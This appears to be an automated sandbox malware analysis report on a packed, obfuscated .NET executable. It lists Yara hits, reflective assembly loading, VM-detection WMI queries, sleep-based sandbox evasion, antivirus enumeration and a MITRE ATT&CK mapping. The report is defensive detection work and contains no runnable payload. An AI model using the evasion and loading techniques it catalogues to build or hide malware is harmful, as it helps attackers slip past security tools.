Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, t9S849sA4DbtdhgyMHE.cs	.Net Code: Type.GetTypeFromHandle(zPv2cPFOG4AqiuIxB4F.jLqCFMFV92(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(zPv2cPFOG4AqiuIxB4F.jLqCFMFV92(16777250)),Type.GetTypeFromHandle(zPv2cPFOG4AqiuIxB4F.jLqCFMFV92(16777305))})

.NET source code contains potential unpacker

Source: ozfqy8Ms6t.exe, VirtualSender.cs	.Net Code: TestSender System.Reflection.Assembly.Load(byte[])
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 1.2.ozfqy8Ms6t.exe.5510000.4.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 1.2.ozfqy8Ms6t.exe.5510000.4.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 1.2.ozfqy8Ms6t.exe.5510000.4.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 1.2.ozfqy8Ms6t.exe.5510000.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 1.2.ozfqy8Ms6t.exe.5510000.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, zodLG9FZrIPND6UmR6e.cs	.Net Code: Y5Bv2BFqXM
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, zodLG9FZrIPND6UmR6e.cs	.Net Code: XHXoRq6nkj

Yara detected Costura Assembly Loader

Source: Yara match	File source: 1.2.ozfqy8Ms6t.exe.4026ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ozfqy8Ms6t.exe.54b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4601478973.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4602971347.00000000054B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4600329598.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ozfqy8Ms6t.exe PID: 7008, type: MEMORYSTR

Source: ozfqy8Ms6t.exe

Static PE information: 0xEED65780 [Sat Dec 22 14:21:52 2096 UTC]

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_02C33174 pushfd ; iretd	1_2_02C33181
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_0542FCF0 pushad ; iretd	1_2_0542FCF1
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_0543B14A push BE000000h; ret	1_2_0543B155
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05430CE6 push 8B000001h; iretd	1_2_05430CEB
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_0543CE3E push esp; ret	1_2_0543CF09
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_057A1586 push es; iretd	1_2_057A1587

Source: ozfqy8Ms6t.exe

Static PE information: section name: .text entropy: 7.9439009479418665

Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, yKT1w3JGiFb7j6mCeNY.cs	High entropy of concatenated method names: 'zibJ5rQTcx', 'MIOk9xBnXNpnlKsPkAZ', 'nDfTchBpiLIKb8YGtdl', 'm2GJrQ2vnm', 'lsTJfJ1nsY', 'p3TJRnum9T', 'qCLJwy7Kmr', 'lWbJmIP7qS', 'jL2J6y1JDP', 'zK4JKm2vK0'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, VpP0QgbUGOi3w4TvJpo.cs	High entropy of concatenated method names: 'vFZbajSeiV', 'hHSQ4IBe0K6Ay7SNRKM', 'MIJ1JABcrkZjIaMcu8j', 'gllb3fmoy3', 'QdvbQhW3nL', 'ioXbXP67Zt', 'aYoZ8qBa2ti8LwA16BR', 'UyA4XwBReGTlgl3iYTy'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, VR5DVnDJxZ1eq899O3.cs	High entropy of concatenated method names: 'kVY53EFlL', 'MOd1B1VH3', 'FrTuk8GMh', 'K7AYstWdy', 'mSY7Cbpwk', 'ijOVEZC8J', 'zvbkiO0uD', 'wPoqg0wFg', 'IhiJOr4Mv3OjkftnmLn', 'pSyHhQ4rQ1q6Mva35pA'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, t9S849sA4DbtdhgyMHE.cs	High entropy of concatenated method names: 'Mg3MqqOHH3blogK8PoF', 'VeOIthOTlEAxPscI6s3', 'HD3F94gTAl', 'vh0ry9Sq2v', 'IScFsfcE53', 'HBTFIOZvux', 'S10FFF99ZG', 'NxrFjdF0h5', 'XSpCsD72qP', 'OANsUjKqmf'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, YT5sTjWje3EeKLxM3V.cs	High entropy of concatenated method names: 'vAVQE4GDS', 'T4wXnUXD3', 'Yx0g3LATK', 'K7BdsvCNr', 'R1oieSYPd', 'MPeyCMISW', 'J1gK5IGgj', 'LVRG7cOhG', 'lmOaTIjqE', 'pGQRMqcVh'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, Wgn0QkbcVNPjcmLIMIp.cs	High entropy of concatenated method names: 'fAdbZlTYcM', 'JSJH7JB1MUS7kFqoi14', 'P7RrYXBuRu2hWBVUfOl', 'KEbb5gt4mf', 'EVaRxKB77bwmycUCbPT', 'swmbIWBVUVw5XupRDjH', 'dDGbrbNPDi', 'e2Pbf8mOik', 'SqHdUDBDmPCPSv1vL4H', 'Gesvo2BE24c0xyEJV0p'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, zodLG9FZrIPND6UmR6e.cs	High entropy of concatenated method names: 'c0MSKiJ76j', 'o4PSe90dKm', 'p2HScqnEXX', 'ahcSMDacO9', 'EL9SrkI5PI', 'P4VSfmT8QC', 'tgXSZSVKZG', 'PW4jxd3dH9', 'YyhSDUpfBy', 'N1tSERDsS8'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, dybu1BFh9y6FiLH1kFy.cs	High entropy of concatenated method names: 'uofFRoIaNx', 'mpgFwNyKay', 'c2iFm6tZRZ', 'rOsF66xR9D', 't2UFKZLWyy', 'lu6Fexm26t', 'SiRFckL42m', 'w6iFMvfFuS', 'opbFrN7AcT', 'sYaFfKl9qt'

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Memory allocated: 2E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Memory allocated: 2C50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 599375	Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Window / User API: threadDelayed 1341			Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Window / User API: threadDelayed 8501			Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 3660	Thread sleep count: 1341 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59856s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 3660	Thread sleep count: 8501 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59715s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59598s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59345s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59105s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -58890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -58781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -58672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -58562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -58453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -58343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -58234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -58125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -58015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -57906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -57797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -57687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -57578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -57468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -57359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -57250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -57140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -57031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -56921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -56809s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -56667s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -56561s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -56413s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -56305s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -56203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -56093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -55972s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -55844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -55734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -55625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -55515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -55406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 1828	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe TID: 7116	Thread sleep time: -59422s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59856	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59715	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59598	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59469	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59345	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59219	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59105	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59000	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 58890	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 58781	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 58672	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 58562	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 58453	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 58343	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 58234	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 58125	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 58015	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 57906	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 57797	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 57687	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 57578	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 57468	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 57359	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 57250	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 57140	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 57031	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 56921	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 56809	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 56667	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 56561	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 56413	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 56305	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 56203	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 56093	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 55972	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 55844	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 55734	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 55625	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 55515	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 55406	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59875	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59766	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59657	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59532	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Thread delayed: delay time: 59422	Jump to behavior

Source: ozfqy8Ms6t.exe, 00000001.00000002.4603424305.00000000057C0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltringLastErrorCode

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

Code function: 1_2_055726F8 LdrInitializeThunk,

1_2_055726F8

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

Queries volume information: C:\Users\user\Desktop\ozfqy8Ms6t.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Disable or Modify Tools	OS Credential Dumping	1 Query Registry	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	141 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
